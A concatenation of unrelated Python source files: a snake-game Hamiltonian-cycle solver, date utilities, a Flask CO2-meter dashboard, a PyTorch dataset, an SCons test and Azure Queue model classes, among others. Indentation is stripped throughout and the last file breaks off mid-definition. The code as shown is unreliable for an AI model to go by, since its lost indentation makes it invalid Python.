context.logger.info('new video "{}"'.format(video.title))
context.bus.add_event(Event(type=Event.NEW_VIDEO, content=video))
if not is_first_run or context.config.archive_all:
video.filename = generate_video_filename(context.config.output_dir, video)
context.video_recorders.start_recording(context, video)
storage.add_video(video)
statistics.notify_video(new=video_not_registered)
def _process_events(context: Context, is_first_run: bool):
try:
for event in context.bus.retrieve_events():
context.plugins.on_event(event, is_first_run)
except Exception:
context.logger.exception('exception in plugin')
class _Statistics:
def __init__(self, is_first_run: bool, monitor_livestreams: bool):
self.is_first_run = is_first_run
self.monitor_livestreams = monitor_livestreams
self.total_videos = 0
self.new_videos = 0
self.active_livestreams = 0
def notify_video(self, new: bool=False):
self.total_videos += 1
if new:
self.new_videos += 1
def notify_active_livestream(self):
self.active_livestreams += 1
def announce(self, logger: logging.Logger):
logger.info(
'{} videos: {}, new: {}, active livestreams: {}'.format(
'total' if self.is_first_run else 'fetched',
self.total_videos,
self.new_videos,
self.active_livestreams if self.monitor_livestreams else 'N/A'
)
)
|
py | b400041678c2e7c783f5faf989e95e7c5a1ab1a3 | from typing import Optional, List
from game.solvers.abstract import AbstractModel
from game.environment import action as act, tile
from game.environment.environment import Environment
from game.solvers.breadth_first_search_longest import \
BreadthFirstSearchLongestPath
from game.vector import Vector, to_direction_vectors
class HamiltonianCycle(AbstractModel):
"""
https://en.wikipedia.org/wiki/Hamiltonian_path
"""
def __init__(self):
super().__init__(
"Hamiltonian Cycle",
"hamiltonian_cycle",
"hc"
)
self._bfsl = BreadthFirstSearchLongestPath()
self._actions = []
self._i = 0
def build_cycle(self, env: Environment) -> Optional[List[Vector]]:
# Attempt to build the list of next actions
head = env.snake.head()
tail = env.snake.tail()
# We build a cycle by building the longest path from the snakes
# head to it's tail. If the snake is only 1 tile long, then we
# make an 'adjustment' and choose a tile next to the head
# as the target, essentially faking a tail.
# This is necessary as our algorithm won't return any actions
# if the from tile is the same as the target tile.
if head == tail:
if tail.x > 1:
adjustment = Vector(-1, 0)
else:
adjustment = Vector(1, 0)
tail = tail + adjustment
built = self._bfsl.longest_path(
env,
head,
tail,
env.snake.action.vector
)
if built is None:
return None
# We've built the longest path from head to tail, but we need to
# check that it covers all vectors.
if len(built) != env.available_tiles_count():
return None
built.append(head)
return built
def next_action(self, environment: Environment) -> act.Action:
# We calculate the cycle one and iterate over it
if not self._actions:
cycle_vectors = self.build_cycle(environment)
if not cycle_vectors:
# If we're not able to build them, it usually means there
# is no path to the fruit. Continue to any available position.
if environment.tile_at(environment.snake.head() + environment.snake.action.vector) != tile.EMPTY:
return environment.random_action()
return environment.snake.action
cycle_action_vectors = to_direction_vectors(cycle_vectors)
self._actions = act.vectors_to_action(cycle_action_vectors)
self._i = 0
# Keep looping over our list of actions
next_action = self._actions[self._i]
self._i += 1
if self._i == len(self._actions):
self._i = 0
return next_action
def reset(self):
self._bfsl.reset()
self._actions = []
self._i = 0
|
py | b40004b5c934d4662c1f10afcf656b54d9ed26c4 | # Copyright (c) 2020 Huawei Technologies Co., Ltd.
# [email protected]
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from dateutil.relativedelta import relativedelta
from datetime import datetime
from datetime import timedelta
import time
weekSet = []
from src.logger_setting.my_logger import get_logger
logger = get_logger()
def get_week_day(date):
week = datetime.strptime(date, "%Y%m%d").weekday()
return week
def add_days(date, num):
return (datetime.strptime(date, "%Y%m%d") + timedelta(days=num)).strftime("%Y%m%d")
def add_months(date, num):
return (datetime.strptime(date, "%Y%m%d") + relativedelta(months=num)).strftime("%Y%m%d")
def get_week_set(first_day, last_day):
week = get_week_day(first_day)
next_day = add_days(first_day, 7 - int(week))
if next_day > last_day:
if first_day < last_day:
weekSet.append(first_day)
weekSet.append(last_day)
else:
weekSet.append(first_day)
get_week_set(next_day, last_day)
return weekSet
def change_week_set(week_set):
if len(week_set) > 10:
if (datetime.strptime(week_set[1], "%Y%m%d") - datetime.strptime(week_set[0], "%Y%m%d")).days >= \
(datetime.strptime(week_set[10], "%Y%m%d") - datetime.strptime(week_set[9], "%Y%m%d")).days:
del week_set[10]
else:
del week_set[0]
return week_set
def is_in_time(date, first_day, last_day):
if first_day <= date < last_day:
return True
else:
return False
def get_time():
return time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
if __name__ == '__main__':
datetime_now = datetime.now()
print(get_week_set("20200101", "20200201"))
print((datetime.strptime(weekSet[4], "%Y%m%d") - datetime.strptime(weekSet[3], "%Y%m%d")).days >
(datetime.strptime(weekSet[1], "%Y%m%d") - datetime.strptime(weekSet[0], "%Y%m%d")).days)
print(is_in_time("20200513", "20200511", "20200518"))
print(is_in_time("20200513", "20200514", "20200518"))
|
py | b400050835399a3a910baf723395ff4fe9dff6eb | from kubeops_api.models.setting import Setting
http_prefix = 'http://'
https_prefix = 'https://'
def get_component_urls(cluster):
urls = {}
app_url = cluster.get_config("APP_DOMAIN").get('value')
if app_url:
urls = {
"grafana": http_prefix + "grafana." + app_url,
"prometheus": http_prefix + "prometheus." + app_url,
"registry-ui": http_prefix + "registry-ui." + app_url,
"dashboard": https_prefix + "dashboard." + app_url,
"traefik": http_prefix + "traefik." + app_url,
"scope": http_prefix + "scope.weave." + app_url,
"ceph": http_prefix + "ceph." + app_url
}
return urls
|
py | b400089450f8864df59c66c1b1389fee95e8a7d4 | from multiprocessing import Value, Lock
class SyncCounter:
def __init__(self, base_value=0):
self._lock = Lock()
self._value = Value('i', base_value)
@property
def ret_increment(self):
with self._lock:
ret_val = self._value.value
self._value.value += 1
return ret_val
@property
def value(self):
with self._lock:
ret_val = self._value.value
return ret_val
class ManagedSyncCounter(SyncCounter):
def __init__(self, manager, base_value=0):
self._lock, self._value = manager.Lock(), manager.Value('i', base_value)
|
py | b40008ca417f073f1f3ac83a9e3df157b63b6b67 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @author: Wesley
# @time: 2020-12-11 10:48
import os
import cv2
from torchvision import transforms
from torch.utils.data import Dataset
class MyDataset(Dataset):
def __init__(self, img_path, mask_path):
super().__init__()
self.img_path = img_path
self.mask_path = mask_path
self.filename = []
for name in os.listdir(img_path):
self.filename.append(name.split('.')[0])
def __getitem__(self, index):
transform = transforms.Compose([
transforms.ToTensor()
])
image = transform(cv2.imread(os.path.join(self.img_path, self.filename[index] + '.jpg'), 1))
mask = transform(cv2.imread(os.path.join(self.mask_path, self.filename[index] + '.png'), 0))
return image, mask
def __len__(self):
return len(self.filename)
if __name__ == '__main__':
img_path = r'E:\PyCharmProject\datasets\5k\train_set\JPEGImages'
mask_path = r'E:\PyCharmProject\datasets\5k\train_set\SegmentationClass'
dataset = MyDataset(img_path, mask_path)
for img, mask in dataset:
print('img', img.shape)
print('mask', mask.shape)
|
py | b40008f4944df4262374b44890831af58675638c | from JumpScale import j
import JumpScale.baselib.circus
class CloudBroker(object):
def startInScreen(self):
j.tools.circus.manager.stopProcess('cloudbroker')
for item in ['byobu', 'screen']:
cmd = 'killall %s' % item
j.system.process.execute(cmd, dieOnNonZeroExitCode=False)
j.system.platform.screen.createSession('cloudbroker', ['appserver',])
print 'Starting cloudbroker appserver...'
path = j.system.fs.joinPaths(j.dirs.baseDir, 'apps', 'cloudbroker')
cmd = 'cd %s; python start_appserver.py' % path
j.system.platform.screen.executeInScreen('cloudbroker', 'appserver', cmd, wait=1)
if not j.system.net.waitConnectionTest('localhost', 9999, 30):
raise RuntimeError('Failed to start appserver') |
py | b400099077361cd01fbff115bb6b49825fb505fa | """ Flask server for CO2meter
(c) Vladimir Filimonov, 2018
E-mail: [email protected]
"""
import optparse
import logging
import threading
import time
import glob
import os
import socket
import signal
import json
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
import flask
from flask import request, render_template, jsonify
import pandas as pd
import co2meter as co2
_DEFAULT_HOST = '127.0.0.1'
_DEFAULT_PORT = '1201'
_DEFAULT_INTERVAL = 30 # seconds
_DEFAULT_NAME = 'co2'
_INIT_TIME = 30 # time to initialize and calibrate device
_URL = 'https://github.com/vfilimonov/co2meter'
_COLORS = {'r': '#E81F2E', 'y': '#FAAF4C', 'g': '#7FB03F'}
_IMG_G = '1324881/36358454-d707e2f4-150e-11e8-9bd1-b479e232f28f'
_IMG_Y = '1324881/36358456-d8b513ba-150e-11e8-91eb-ade37733b19e'
_IMG_R = '1324881/36358457-da3e3e8c-150e-11e8-85af-855571275d88'
_RANGE_MID = [800, 1200]
_CO2_MAX_VALUE = 3200 # Cut our yaxis here
_DEGREES_CELSIUS = "℃" # Unicode U+2103, Degree Celisus
_DEGREES_FAHRENHEIT = "℉" # Unicode U+2109, Degree Fahrenheit
_name = _DEFAULT_NAME
_fahrenheit = False
###############################################################################
mon = None
###############################################################################
app = flask.Flask(__name__)
app.jinja_env.auto_reload = True
app.config['TEMPLATES_AUTO_RELOAD'] = True
###############################################################################
@app.route('/')
def home():
# Read CO2 and temp values
if mon is None:
status = '<h1 align="center" style="color:%s;">Device is not connected</h1>' % _COLORS['r']
else:
status = ''
try:
vals = list(mon._last_data)
vals[-1] = '%.1f' % vals[-1]
except:
data = read_logs()
vals = data.split('\n')[-2].split(',')
if status == '':
status = '<h1 align="center" style="color:%s;">Device is not ready</h1>' % _COLORS['r']
# Select image and color
if int(vals[1]) >= _RANGE_MID[1]:
color = _COLORS['r']
img = _IMG_R
elif int(vals[1]) < _RANGE_MID[0]:
color = _COLORS['g']
img = _IMG_G
else:
color = _COLORS['y']
img = _IMG_Y
co2 = '<font color="%s">%s ppm</font>' % (color, vals[1])
temperature = vals[2]
deg = _DEGREES_CELSIUS
global _fahrenheit
if _fahrenheit:
deg = _DEGREES_FAHRENHEIT
temperature = round(celsiusToFahrenheit(temperature), ndigits=1)
# Return template
return render_template('index.html', image=img, timestamp=vals[0],
co2=vals[1], color=color, temp=temperature, url=_URL,
status=status, degrees=deg)
#############################################################################
@app.route('/log', defaults={'logname': None})
@app.route('/log/<string:logname>')
def log(logname):
data = read_logs(name=logname)
return '<h1>Full log</h1>' + wrap_table(data)
@app.route('/log.csv', defaults={'logname': None})
@app.route('/log/<string:logname>.csv')
def log_csv(logname):
data = read_logs(name=logname)
return wrap_csv(data, logname)
@app.route('/log.json', defaults={'logname': None})
@app.route('/log/<string:logname>.json')
def log_json(logname):
data = read_logs(name=logname)
return wrap_json(data)
#############################################################################
@app.route('/rename')
def get_shape_positions():
args = request.args
logging.info('rename', args.to_dict())
new_name = args.get('name', default=None, type=str)
if new_name is None:
return 'Error: new log name is not specified!'
global _name
_name = new_name
return 'Log name has changed to "%s"' % _name
#############################################################################
@app.route('/kill')
def shutdown():
server_stop()
global _monitoring
_monitoring = False
return 'Server shutting down...'
#############################################################################
# Dashboard on plotly.js
#############################################################################
def prepare_data(name=None, span='24H'):
data = read_logs(name)
data = pd.read_csv(StringIO(data), parse_dates=[0]).set_index('timestamp')
if span != 'FULL':
data = data.last(span)
global _fahrenheit
if _fahrenheit:
data['temp'] = data['temp'].apply(celsiusToFahrenheit)
if span == '24H':
data = data.resample('60s').mean()
elif span == '7D':
data = data.resample('600s').mean()
elif span == '30D':
data = data.resample('1H').mean()
elif span == 'FULL':
if len(data) > 3000: # Resample only long series
data = data.resample('1H').mean()
data = data.round({'co2': 0, 'temp': 1})
return data
def rect(y0, y1, color):
return {'type': 'rect', 'layer': 'below',
'xref': 'paper', 'x0': 0, 'x1': 1,
'yref': 'y', 'y0': y0, 'y1': y1,
'fillcolor': color, 'opacity': 0.2, 'line': {'width': 0}}
def caption(title, x, y):
return {'xref': 'paper', 'yref': 'paper', 'x': x, 'y': y, 'text': title,
'showarrow': False, 'font': {'size': 16},
'xanchor': 'center', 'yanchor': 'bottom'}
#############################################################################
@app.route("/chart/", strict_slashes=False)
@app.route("/chart/<name>", strict_slashes=False)
@app.route("/chart/<name>/<freq>", strict_slashes=False)
def chart_co2_temp(name=None, freq='24H'):
data = prepare_data(name, freq)
defaultTMin = 15
defaultTMax = 27
temperatureData = data['temp']
deg = _DEGREES_CELSIUS
global _fahrenheit
if _fahrenheit:
defaultTMin = 60
defaultTMax = 80
deg = _DEGREES_FAHRENHEIT
co2_min = min(500, data['co2'].min() - 50)
co2_max = min(max(2000, data['co2'].max() + 50), _CO2_MAX_VALUE)
t_min = min(defaultTMin, temperatureData.min())
t_max = max(defaultTMax, temperatureData.max())
rect_green = rect(co2_min, _RANGE_MID[0], _COLORS['g'])
rect_yellow = rect(_RANGE_MID[0], _RANGE_MID[1], _COLORS['y'])
rect_red = rect(_RANGE_MID[1], co2_max, _COLORS['r'])
# Check if mobile
try:
agent = request.headers.get('User-Agent')
phones = ['iphone', 'android', 'blackberry', 'fennec', 'iemobile']
staticPlot = any(phone in agent.lower() for phone in phones)
except RuntimeError:
staticPlot = False
# Make figure
index = data.index.format()
co2 = list(pd.np.where(data.co2.isnull(), None, data.co2))
temp = list(pd.np.where(data.temp.isnull(), None, data.temp))
d_co2 = {'mode': 'lines+markers', 'type': 'scatter',
'name': 'CO2 concentration',
'xaxis': 'x1', 'yaxis': 'y1',
'x': index, 'y': co2}
d_temp = {'mode': 'lines+markers', 'type': 'scatter',
'name': 'Temperature',
'xaxis': 'x1', 'yaxis': 'y2',
'x': index, 'y': temp}
config = {'displayModeBar': False, 'staticPlot': staticPlot}
layout = {'margin': {'l': 30, 'r': 10, 'b': 30, 't': 30},
'showlegend': False,
'shapes': [rect_green, rect_yellow, rect_red],
'xaxis1': {'domain': [0, 1], 'anchor': 'y2'},
'yaxis1': {'domain': [0.55, 1], 'anchor': 'free', 'position': 0,
'range': [co2_min, co2_max]},
'yaxis2': {'domain': [0, 0.45], 'anchor': 'x1',
'range': [t_min, t_max]},
'annotations': [caption('CO2 concentration (ppm)', 0.5, 1),
caption(f'Temperature ({deg})', 0.5, 0.45)]
}
fig = {'data': [d_co2, d_temp], 'layout': layout, 'config': config}
return jsonify(fig)
#############################################################################
@app.route("/dashboard")
def dashboard_plotly():
# Get list of files
files = glob.glob('logs/*.csv')
files = [os.path.splitext(os.path.basename(_))[0] for _ in files]
# And find selected for jinja template
files = [(_, _ == _name) for _ in files]
return render_template('dashboard.html', files=files)
#############################################################################
# Monitoring routines
#############################################################################
def read_logs(name=None):
""" read log files """
if name is None:
name = _name
with open(os.path.join('logs', name + '.csv'), 'r') as f:
data = f.read()
return data
#############################################################################
def write_to_log(vals):
""" file name for a current log """
# Create file if does not exist
fname = os.path.join('logs', _name + '.csv')
if not os.path.exists('logs'):
os.makedirs('logs')
if not os.path.isfile(fname):
with open(fname, 'a') as f:
f.write('timestamp,co2,temp\n')
# Append to file
with open(fname, 'a') as f:
f.write('%s,%d,%.1f\n' % vals)
def read_co2_data():
""" A small hack to read co2 data from monitor in order to account for case
when monitor is not initialized yet
"""
global mon
if mon is None:
# Try to initialize
try:
mon = co2.CO2monitor()
# Sleep. If we read from device before it is calibrated, we'll
# get wrong values
time.sleep(_INIT_TIME)
except OSError:
return None
try:
return mon.read_data_raw(max_requests=1000)
except OSError:
# We kill the link and will require to initialize monitor again next time
mon = None
return None
def monitoring_CO2(interval):
""" Tread for monitoring / logging """
while _monitoring:
# Request concentration and temperature
vals = read_co2_data()
if vals is None:
logging.info('[%s] monitor is not connected' % co2.now())
else:
# Write to log and sleep
logging.info('[%s] %d ppm, %.1f deg C' % tuple(vals))
write_to_log(vals)
# Sleep for the next call
time.sleep(interval)
#############################################################################
def start_monitor(interval=_DEFAULT_INTERVAL):
""" Start CO2 monitoring in a thread """
logging.basicConfig(level=logging.INFO)
global _monitoring
_monitoring = True
t = threading.Thread(target=monitoring_CO2, args=(interval,))
t.start()
return t
#############################################################################
def init_homekit_target(port, host):
try:
from .homekit import start_homekit
except:
from homekit import start_homekit
global mon
while mon is None:
time.sleep(5)
logging.info('Starting homekit server')
start_homekit(mon, host=host, port=port, monitoring=False, handle_sigint=False)
def init_homekit(port, host):
# We'll start homekit once the device is connected
t = threading.Thread(target=init_homekit_target, args=(port, host, ))
t.start()
#############################################################################
# Server routines
#############################################################################
def my_ip():
""" Get my local IP address """
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
s.connect(("8.8.8.8", 80)) # Google Public DNS
return s.getsockname()[0]
def start_server_homekit():
""" Start monitoring, flask/dash server and homekit accessory """
# Based on http://flask.pocoo.org/snippets/133/
try:
from .homekit import PORT
except:
# the case of running not from the installed module
from homekit import PORT
host = my_ip()
parser = optparse.OptionParser()
parser.add_option("-H", "--host",
help="Hostname of the Flask app [default %s]" % host,
default=host)
parser.add_option("-P", "--port-flask",
help="Port for the Flask app [default %s]" % _DEFAULT_PORT,
default=_DEFAULT_PORT)
parser.add_option("-K", "--port-homekit",
help="Port for the Homekit accessory [default %s]" % PORT,
default=PORT)
parser.add_option("-N", "--name",
help="Name for the log file [default %s]" % _DEFAULT_NAME,
default=_DEFAULT_NAME)
options, _ = parser.parse_args()
global _name
_name = options.name
# Start monitoring
t_monitor = start_monitor()
# Start a thread that will initialize homekit once device is connected
init_homekit(host=options.host, port=int(options.port_homekit))
# Start server
app.run(host=options.host, port=int(options.port_flask))
#############################################################################
def start_server():
""" Runs Flask instance using command line arguments """
# Based on http://flask.pocoo.org/snippets/133/
parser = optparse.OptionParser()
parser.add_option("-H", "--host",
help="Hostname of the Flask app [default %s]" % _DEFAULT_HOST,
default=_DEFAULT_HOST)
parser.add_option("-P", "--port",
help="Port for the Flask app [default %s]" % _DEFAULT_PORT,
default=_DEFAULT_PORT)
parser.add_option("-I", "--interval",
help="Interval in seconds for CO2meter requests [default %d]" % _DEFAULT_INTERVAL,
default=_DEFAULT_INTERVAL)
parser.add_option("-N", "--name",
help="Name for the log file [default %s]" % _DEFAULT_NAME,
default=_DEFAULT_NAME)
parser.add_option("-m", "--nomonitoring",
help="No live monitoring (only flask server)",
action="store_true", dest="no_monitoring")
parser.add_option("-s", "--noserver",
help="No server (only monitoring to file)",
action="store_true", dest="no_server")
parser.add_option("-d", "--debug",
action="store_true", dest="debug",
help=optparse.SUPPRESS_HELP)
parser.add_option("-F", "--fahrenheit",
help="Show the temperature in Fahrenheit [default False]",
action="store_true",
default=False,
dest="fahrenheit")
options, _ = parser.parse_args()
if options.debug and not options.no_monitoring:
parser.error("--debug option could be used only with --no_monitoring")
global _name
_name = options.name
global _fahrenheit
_fahrenheit = options.fahrenheit
# Start monitoring
if not options.no_monitoring:
start_monitor(interval=int(options.interval))
# Start server
if not options.no_server:
app.run(debug=options.debug, host=options.host, port=int(options.port))
def stop_server():
func = request.environ.get('werkzeug.server.shutdown')
if func is None:
raise RuntimeError('Not running with the Werkzeug Server')
func()
###############################################################################
def wrap_csv(data, fname='output'):
""" Make CSV response downloadable """
if fname is None:
fname = 'log'
si = StringIO(data)
output = flask.make_response(si.getvalue())
output.headers["Content-Disposition"] = "attachment; filename=%s.csv" % fname
output.headers["Content-type"] = "text/csv"
return output
def wrap_json(data):
""" Convert CSV to JSON and make it downloadable """
entries = [_.split(',') for _ in data.split('\n') if _ != '']
js = [{k: v for k, v in zip(['timestamp', 'co2', 'temp'], x)}
for x in entries[1:]]
return jsonify(js)
def wrap_table(data):
""" Return HTML for table """
res = ('<table><thead><tr><th>Timestamp</th><th>CO2 concentration</th>'
'<th>Temperature</th></tr></thead><tbody>')
for line in data.split('\n')[1:]:
res += '<tr>' + ''.join(['<td>%s</td>' % d for d in line.split(',')]) + '</tr>'
res += '</tbody></table>'
return res
###############################################################################
def celsiusToFahrenheit(c):
return (9 * float(c)) / 5 + 32
###############################################################################
if __name__ == '__main__':
# start_server() will take care of start_monitor()
start_server()
# start_server_homekit()
|
py | b40009a49693d223c8d2e190103c77ae77c5aa59 | #!/usr/bin/env python
#
# Copyright (c) 2001-2010 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
"""
Test the root.name argument for the chunked HTML builder.
"""
import os
import sys
import TestSCons
test = TestSCons.TestSCons()
if not (sys.platform.startswith('linux') and
os.path.isdir('/usr/share/xml/docbook/stylesheet/docbook-xsl')):
test.skip_test('Wrong OS or no stylesheets installed, skipping test.\n')
try:
import lxml
except Exception:
test.skip_test('Cannot find installed Python binding for lxml, skipping test.\n')
test.dir_fixture('image')
# Normal invocation
test.run(stderr=None)
test.must_not_be_empty(test.workpath('manual.html'))
# Cleanup
test.run(arguments='-c')
test.must_not_exist(test.workpath('manual.html'))
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
py | b4000bfdd28456ae9282bd91f23d41a04677e3e9 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import datetime
from typing import Dict, List, Optional, Union
from azure.core.exceptions import HttpResponseError
import msrest.serialization
from ._azure_queue_storage_enums import *
class AccessPolicy(msrest.serialization.Model):
"""An Access policy.
:param start: the date-time the policy is active.
:type start: str
:param expiry: the date-time the policy expires.
:type expiry: str
:param permission: the permissions for the acl policy.
:type permission: str
"""
_attribute_map = {
'start': {'key': 'Start', 'type': 'str'},
'expiry': {'key': 'Expiry', 'type': 'str'},
'permission': {'key': 'Permission', 'type': 'str'},
}
def __init__(
self,
*,
start: Optional[str] = None,
expiry: Optional[str] = None,
permission: Optional[str] = None,
**kwargs
):
super(AccessPolicy, self).__init__(**kwargs)
self.start = start
self.expiry = expiry
self.permission = permission
class CorsRule(msrest.serialization.Model):
"""CORS is an HTTP feature that enables a web application running under one domain to access resources in another domain. Web browsers implement a security restriction known as same-origin policy that prevents a web page from calling APIs in a different domain; CORS provides a secure way to allow one domain (the origin domain) to call APIs in another domain.
All required parameters must be populated in order to send to Azure.
:param allowed_origins: Required. The origin domains that are permitted to make a request
against the storage service via CORS. The origin domain is the domain from which the request
originates. Note that the origin must be an exact case-sensitive match with the origin that the
user age sends to the service. You can also use the wildcard character '*' to allow all origin
domains to make requests via CORS.
:type allowed_origins: str
:param allowed_methods: Required. The methods (HTTP request verbs) that the origin domain may
use for a CORS request. (comma separated).
:type allowed_methods: str
:param allowed_headers: Required. the request headers that the origin domain may specify on the
CORS request.
:type allowed_headers: str
:param exposed_headers: Required. The response headers that may be sent in the response to the
CORS request and exposed by the browser to the request issuer.
:type exposed_headers: str
:param max_age_in_seconds: Required. The maximum amount time that a browser should cache the
preflight OPTIONS request.
:type max_age_in_seconds: int
"""
_validation = {
'allowed_origins': {'required': True},
'allowed_methods': {'required': True},
'allowed_headers': {'required': True},
'exposed_headers': {'required': True},
'max_age_in_seconds': {'required': True, 'minimum': 0},
}
_attribute_map = {
'allowed_origins': {'key': 'AllowedOrigins', 'type': 'str'},
'allowed_methods': {'key': 'AllowedMethods', 'type': 'str'},
'allowed_headers': {'key': 'AllowedHeaders', 'type': 'str'},
'exposed_headers': {'key': 'ExposedHeaders', 'type': 'str'},
'max_age_in_seconds': {'key': 'MaxAgeInSeconds', 'type': 'int'},
}
def __init__(
self,
*,
allowed_origins: str,
allowed_methods: str,
allowed_headers: str,
exposed_headers: str,
max_age_in_seconds: int,
**kwargs
):
super(CorsRule, self).__init__(**kwargs)
self.allowed_origins = allowed_origins
self.allowed_methods = allowed_methods
self.allowed_headers = allowed_headers
self.exposed_headers = exposed_headers
self.max_age_in_seconds = max_age_in_seconds
class DequeuedMessageItem(msrest.serialization.Model):
"""The object returned in the QueueMessageList array when calling Get Messages on a Queue.
All required parameters must be populated in order to send to Azure.
:param message_id: Required. The Id of the Message.
:type message_id: str
:param insertion_time: Required. The time the Message was inserted into the Queue.
:type insertion_time: ~datetime.datetime
:param expiration_time: Required. The time that the Message will expire and be automatically
deleted.
:type expiration_time: ~datetime.datetime
:param pop_receipt: Required. This value is required to delete the Message. If deletion fails
using this popreceipt then the message has been dequeued by another client.
:type pop_receipt: str
:param time_next_visible: Required. The time that the message will again become visible in the
Queue.
:type time_next_visible: ~datetime.datetime
:param dequeue_count: Required. The number of times the message has been dequeued.
:type dequeue_count: long
:param message_text: Required. The content of the Message.
:type message_text: str
"""
_validation = {
'message_id': {'required': True},
'insertion_time': {'required': True},
'expiration_time': {'required': True},
'pop_receipt': {'required': True},
'time_next_visible': {'required': True},
'dequeue_count': {'required': True},
'message_text': {'required': True},
}
_attribute_map = {
'message_id': {'key': 'MessageId', 'type': 'str'},
'insertion_time': {'key': 'InsertionTime', 'type': 'rfc-1123'},
'expiration_time': {'key': 'ExpirationTime', 'type': 'rfc-1123'},
'pop_receipt': {'key': 'PopReceipt', 'type': 'str'},
'time_next_visible': {'key': 'TimeNextVisible', 'type': 'rfc-1123'},
'dequeue_count': {'key': 'DequeueCount', 'type': 'long'},
'message_text': {'key': 'MessageText', 'type': 'str'},
}
_xml_map = {
'name': 'QueueMessage'
}
def __init__(
self,
*,
message_id: str,
insertion_time: datetime.datetime,
expiration_time: datetime.datetime,
pop_receipt: str,
time_next_visible: datetime.datetime,
dequeue_count: int,
message_text: str,
**kwargs
):
super(DequeuedMessageItem, self).__init__(**kwargs)
self.message_id = message_id
self.insertion_time = insertion_time
self.expiration_time = expiration_time
self.pop_receipt = pop_receipt
self.time_next_visible = time_next_visible
self.dequeue_count = dequeue_count
self.message_text = message_text
class EnqueuedMessage(msrest.serialization.Model):
"""The object returned in the QueueMessageList array when calling Put Message on a Queue.
All required parameters must be populated in order to send to Azure.
:param message_id: Required. The Id of the Message.
:type message_id: str
:param insertion_time: Required. The time the Message was inserted into the Queue.
:type insertion_time: ~datetime.datetime
:param expiration_time: Required. The time that the Message will expire and be automatically
deleted.
:type expiration_time: ~datetime.datetime
:param pop_receipt: Required. This value is required to delete the Message. If deletion fails
using this popreceipt then the message has been dequeued by another client.
:type pop_receipt: str
:param time_next_visible: Required. The time that the message will again become visible in the
Queue.
:type time_next_visible: ~datetime.datetime
"""
_validation = {
'message_id': {'required': True},
'insertion_time': {'required': True},
'expiration_time': {'required': True},
'pop_receipt': {'required': True},
'time_next_visible': {'required': True},
}
_attribute_map = {
'message_id': {'key': 'MessageId', 'type': 'str'},
'insertion_time': {'key': 'InsertionTime', 'type': 'rfc-1123'},
'expiration_time': {'key': 'ExpirationTime', 'type': 'rfc-1123'},
'pop_receipt': {'key': 'PopReceipt', 'type': 'str'},
'time_next_visible': {'key': 'TimeNextVisible', 'type': 'rfc-1123'},
}
_xml_map = {
'name': 'QueueMessage'
}
def __init__(
self,
*,
message_id: str,
insertion_time: datetime.datetime,
expiration_time: datetime.datetime,
pop_receipt: str,
time_next_visible: datetime.datetime,
**kwargs
):
super(EnqueuedMessage, self).__init__(**kwargs)
self.message_id = message_id
self.insertion_time = insertion_time
self.expiration_time = expiration_time
self.pop_receipt = pop_receipt
self.time_next_visible = time_next_visible
class GeoReplication(msrest.serialization.Model):
"""GeoReplication.
All required parameters must be populated in order to send to Azure.
:param status: Required. The status of the secondary location. Possible values include: "live",
"bootstrap", "unavailable".
:type status: str or ~azure.storage.queue.models.GeoReplicationStatusType
:param last_sync_time: Required. A GMT date/time value, to the second. All primary writes
preceding this value are guaranteed to be available for read operations at the secondary.
Primary writes after this point in time may or may not be available for reads.
:type last_sync_time: ~datetime.datetime
"""
_validation = {
'status': {'required': True},
'last_sync_time': {'required': True},
}
_attribute_map = {
'status': {'key': 'Status', 'type': 'str'},
'last_sync_time': {'key': 'LastSyncTime', 'type': 'rfc-1123'},
}
def __init__(
self,
*,
status: Union[str, "GeoReplicationStatusType"],
last_sync_time: datetime.datetime,
**kwargs
):
super(GeoReplication, self).__init__(**kwargs)
self.status = status
self.last_sync_time = last_sync_time
class ListQueuesSegmentResponse(msrest.serialization.Model):
"""The object returned when calling List Queues on a Queue Service.
All required parameters must be populated in order to send to Azure.
:param service_endpoint: Required.
:type service_endpoint: str
:param prefix: Required.
:type prefix: str
:param marker:
:type marker: str
:param max_results: Required.
:type max_results: int
:param queue_items:
:type queue_items: list[~azure.storage.queue.models.QueueItem]
:param next_marker: Required.
:type next_marker: str
"""
_validation = {
'service_endpoint': {'required': True},
'prefix': {'required': True},
'max_results': {'required': True},
'next_marker': {'required': True},
}
_attribute_map = {
'service_endpoint': {'key': 'ServiceEndpoint', 'type': 'str', 'xml': {'attr': True}},
'prefix': {'key': 'Prefix', 'type': 'str'},
'marker': {'key': 'Marker', 'type': 'str'},
'max_results': {'key': 'MaxResults', 'type': 'int'},
